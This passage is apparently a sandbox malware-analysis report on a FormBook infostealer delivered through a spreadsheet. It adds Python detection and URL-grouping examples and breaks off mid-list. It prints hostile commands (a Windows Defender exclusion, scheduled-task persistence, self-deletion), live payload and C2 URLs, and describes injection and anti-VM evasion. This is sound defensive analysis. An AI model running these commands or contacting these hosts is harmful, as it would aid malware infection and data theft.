          Source: vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 0000000000099904 second address: 000000000009990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 0000000000099B7E second address: 0000000000099B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796 | Thread sleep time: -120000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2592 | Thread sleep time: -30293s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2064 | Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2152 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00409AB0 rdtsc 9_2_00409AB0
          Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 30293
          Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000A.00000000.552591069.000000000457A000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp | Binary or memory string: Y4*vMciU,ho)r;
          Source: explorer.exe, 0000000A.00000000.552591069.000000000457A000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000003.472102078.0000000000809000.00000004.00000001.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 0000000A.00000000.552449916.000000000449C000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0loQ&
          Source: explorer.exe, 0000000A.00000000.490732590.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00409AB0 rdtsc 9_2_00409AB0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AC0080 mov ecx, dword ptr fs:[00000030h] 9_2_00AC0080
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AC00EA mov eax, dword ptr fs:[00000030h] 9_2_00AC00EA
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AE26F8 mov eax, dword ptr fs:[00000030h] 9_2_00AE26F8
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025A26F8 mov eax, dword ptr fs:[00000030h] 11_2_025A26F8
          Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0040ACF0 LdrLoadDll, 9_2_0040ACF0
          Source: C:\Users\Public\vbc.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 52.128.23.153 80
          Source: C:\Windows\explorer.exe | Domain query: www.metafirstclass.com
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: D80000
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign process
          Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 1764
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: explorer.exe, 0000000A.00000000.549499857.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491344404.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.483588339.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 0000000A.00000000.549499857.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491344404.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.483588339.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 0000000A.00000000.549499857.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491344404.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.483588339.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
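The process-creation events above (Equation Editor spawning C:\Users\Public\vbc.exe, the Add-MpPreference exclusion, the schtasks /XML import from Temp, a rundll32.exe launched without any DLL to run, and the cmd /c del clean-up) are the kind of telemetry a detection engineer can match without a sample-specific indicator. The following Python script is an added example and not part of the Joe Sandbox report: it runs a handful of such rules over a small set of constructed process-creation records whose command lines are modelled on the ones listed above. The pipe-separated field layout, the PIDs and the rule names are assumptions made for the example, not any EDR's real schema.

```python
"""Rule-based triage of process-creation telemetry.

Added example, not part of the Joe Sandbox report. The records below are
constructed for this example: their command lines mirror the ones in the
report, while the flat "pid|ppid|parent image|image|command line" layout,
the PIDs and the rule names are assumptions, not a real EDR schema.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Constructed sample records (pid|ppid|parent image|image|command line).
SAMPLE_EVENTS = r"""
5|4|C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|C:\Users\Public\vbc.exe|"C:\Users\Public\vbc.exe"
6|5|C:\Users\Public\vbc.exe|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe|"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe"
7|5|C:\Users\Public\vbc.exe|C:\Windows\SysWOW64\schtasks.exe|"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp"
9|5|C:\Users\Public\vbc.exe|C:\Users\Public\vbc.exe|C:\Users\Public\vbc.exe
12|10|C:\Windows\explorer.exe|C:\Windows\SysWOW64\rundll32.exe|C:\Windows\SysWOW64\rundll32.exe
13|12|C:\Windows\SysWOW64\rundll32.exe|C:\Windows\SysWOW64\cmd.exe|/c del "C:\Users\Public\vbc.exe"
14|1|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|"C:\Windows\System32\notepad.exe"
"""


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    parent_image: str
    image: str
    cmdline: str


def parse_events(text: str) -> List[ProcEvent]:
    """Parse the pipe-separated records. The command line is the last field
    and may itself contain spaces and quotes, so split at most four times."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, parent, image, cmd = line.split("|", 4)
        events.append(ProcEvent(int(pid), int(ppid), parent, image, cmd))
    return events


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


DEFENDER_EXCLUSION = re.compile(r"add-mppreference\b.*-exclusion(path|process|extension)", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
# A genuine rundll32 invocation names a DLL (or CPL/AX) and usually an entry point after a comma.
RUNDLL32_HAS_TARGET = re.compile(r"\.(dll|cpl|ax)\b|,", re.I)


def triage(events: Iterable[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule) pairs for every rule each event trips.

    The rules are indicator-free on purpose: they describe the behaviour
    the report shows, not its hashes, domains or file names."""
    findings: List[Tuple[int, str]] = []
    for ev in events:
        parent, child, cmd = _basename(ev.parent_image), _basename(ev.image), ev.cmdline
        # Equation Editor has no legitimate reason to spawn anything.
        if parent == "eqnedt32.exe":
            findings.append((ev.pid, "equation_editor_child"))
        # World-writable location that is rarely a legitimate executable path.
        if ev.image.lower().startswith("c:\\users\\public\\"):
            findings.append((ev.pid, "exec_from_public"))
        # Defender exclusion added from PowerShell.
        if child == "powershell.exe" and DEFENDER_EXCLUSION.search(cmd):
            findings.append((ev.pid, "defender_exclusion"))
        # Scheduled task registered from an XML definition dropped in Temp.
        if (child == "schtasks.exe" and re.search(r"/create\b", cmd, re.I)
                and re.search(r"/xml\b", cmd, re.I) and TEMP_DIR.search(cmd)):
            findings.append((ev.pid, "schtask_from_temp_xml"))
        # rundll32 started with nothing to run: a sacrificial host for injected code.
        if child == "rundll32.exe" and not RUNDLL32_HAS_TARGET.search(cmd):
            findings.append((ev.pid, "rundll32_no_target"))
        # The injected host deleting the original dropper.
        if parent == "rundll32.exe" and child == "cmd.exe" and re.search(r"\bdel\b", cmd, re.I):
            findings.append((ev.pid, "rundll32_self_delete"))
    return findings


if __name__ == "__main__":
    for pid, rule in triage(parse_events(SAMPLE_EVENTS)):
        print(f"pid {pid}: {rule}")
```

The rundll32 rule accepts any command line that names a .dll/.cpl/.ax file or contains a comma, so `rundll32.exe shell32.dll,Control_RunDLL` passes while the bare `rundll32.exe` seen in this report is flagged; software that references a DLL without its extension will need an allow-list. The same applies to C:\Users\Public: some deployment tools do stage installers there, so treat that rule as a scoring signal rather than a blocker.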

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, file source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: the same Yara matches (seven UNPACKEDPE and eleven MEMORY sources) already listed under Stealing of Sensitive Information; the report repeats that list under both headings.

          MITRE ATT&CK Matrix

          Reconstructed from the flattened matrix. Digits in square brackets are the report's own counters printed next to the techniques it matched; cells without a counter are the unmatched background of the matrix.

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Command and Scripting Interpreter [1] | Scheduled Task/Job [1] | Process Injection [612] | Rootkit [1] | Credential API Hooking [1] | Security Software Discovery [321] | Remote Services | Credential API Hooking [1] | Exfiltration Over Other Network Medium | Encrypted Channel [1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job [1] | Boot or Logon Initialization Scripts | Scheduled Task/Job [1] | Masquerading [111] | LSASS Memory | Process Discovery [2] | Remote Desktop Protocol | Archive Collected Data [1] | Exfiltration Over Bluetooth | Ingress Tool Transfer [12] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Shared Modules [1] | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools [11] | Security Account Manager | Virtualization/Sandbox Evasion [31] | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol [2] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | Exploitation for Client Execution [13] | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion [31] | NTDS | Remote System Discovery [1] | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol [122] | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection [612] | LSA Secrets | File and Directory Discovery [2] | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information [1] | Cached Domain Credentials | System Information Discovery [112] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information [3] | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Rundll32 [1] | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Software Packing [13] | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

          Behavior Graph ID: 528790, Sample: Payment Details.xlsx, Start date: 25/11/2021, Architecture: WINDOWS, Score: 100

          Signatures attached to the top node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 21 other signatures.

          Process tree reconstructed from the graph (the graph's edge labels "started", "dropped" and "injected" are kept; nesting replaces the arrows):

          • EXCEL.EXE (started)
            • dropped: C:\Users\user\...\~$Payment Details.xlsx (data)
          • EQNEDT32.EXE (started)
            • DNS/IP: 202.55.132.154:80 (local port 49165), ADTEC-AS-VN ADTEC Media Joint Stock Company VN, Viet Nam
            • dropped: C:\Users\user\AppData\Local\...\vbc[1].exe (PE32)
            • dropped: C:\Users\Public\vbc.exe (PE32)
            • signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            • started: vbc.exe
              • dropped: C:\Users\user\AppData\...\OmnbtuhFsJys.exe (PE32)
              • dropped: C:\Users\user\AppData\Local\...\tmpC92A.tmp (XML)
              • signatures: Multi AV Scanner detection for dropped file; Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; 2 other signatures
              • started: vbc.exe
                • signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                • injected: explorer.exe
                  • DNS/IP: www.metafirstclass.com, 52.128.23.153:80 (local port 49167), DOSARRESTUS, United States
                  • signature: System process connects to network (likely due to code injection or exploit)
                  • started: rundll32.exe
                    • signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    • started: cmd.exe
              • started: powershell.exe
              • started: schtasks.exe

          Screenshots

          (The screenshot thumbnails of the analysis are not reproduced in this text version.)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Payment Details.xlsx | 36% | Virustotal |
          Payment Details.xlsx | 33% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 50% | ReversingLabs | ByteCode-MSIL.Spyware.Noon
          C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe | 50% | ReversingLabs | ByteCode-MSIL.Spyware.Noon
          C:\Users\Public\vbc.exe | 50% | ReversingLabs | ByteCode-MSIL.Spyware.Noon

          Unpacked PE Files

          Source | Detection | Scanner | Label
          9.2.vbc.exe.706380.3.unpack | 100% | Avira | TR/ATRAPS.Gen
          9.2.vbc.exe.30000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
          9.0.vbc.exe.400000.10.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.0.vbc.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.0.vbc.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.2.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.metafirstclass.com/g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x | 0% | Avira URL Cloud | safe
          http://java.sun.com | 0% | URL Reputation | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://202.55.132.154/384500000_1/vbc.exe | 13% | Virustotal |
          http://202.55.132.154/384500000_1/vbc.exe | 100% | Avira URL Cloud | malware
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          www.blancheshelley.xyz/g2fg/ | 9% | Virustotal |
          www.blancheshelley.xyz/g2fg/ | 100% | Avira URL Cloud | phishing
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.metafirstclass.com | 52.128.23.153 | true | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.metafirstclass.com/g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x | true | Avira URL Cloud: safe | unknown
          http://202.55.132.154/384500000_1/vbc.exe | true | 13% Virustotal; Avira URL Cloud: malware | unknown
          www.blancheshelley.xyz/g2fg/ | true | 9% Virustotal; Avira URL Cloud: phishing | low
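Every C2 URL in this report, the one actually contacted, the configured fallback path on www.blancheshelley.xyz, and the URLs of the other samples that reached 52.128.23.153 (listed later under Joe Sandbox View / Context), has the same shape: a single four-character directory (here g2fg) followed, on the beacon itself, by a query string with two randomly named parameters, one carrying a long base64-like blob and the other a short token. The script below is an added example and not part of the report: it extracts that directory as a campaign key and applies the shape as a heuristic, so URLs pulled from proxy logs can be grouped by campaign for pivoting. The heuristic, the 40-character threshold, the character classes and the function names are assumptions of this example; the sample URLs are copied from this report plus two constructed benign ones.

```python
"""Heuristic grouping of FormBook-style beacon URLs.

Added example, not part of the Joe Sandbox report. The shape it checks is
the one every C2 URL in this report shares (a four-character directory and
a two-parameter query with exactly one long base64-like value); the
40-character threshold, the character classes and the function names are
assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# URLs copied from the report (this sample's C2, its configured fallback
# path, and three URLs from other samples that hit the same IP), followed by
# two constructed benign URLs that share part of the shape.
SAMPLE_URLS = [
    "http://www.metafirstclass.com/g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x",
    "www.blancheshelley.xyz/g2fg/",
    "www.teslabotnews.com/b3n1/?6lP=aUXk73yzMCo1/L4iXfPwqTXDL3lL/7gah35/YqDHpJTg3gHAjQWWkwmc6DJWZpG9FVC6&3f0pfr=Kl08lv",
    "www.primetimeexpress.com/unzn/?y484Hx=-ZBHbB&ADH05pfH=MJyeuj/2LKgxhmwBEaOepQoT7p7qWMZxszA12ONlFtrFds1veJHUTtJAiK7RWXKTq53B3g==",
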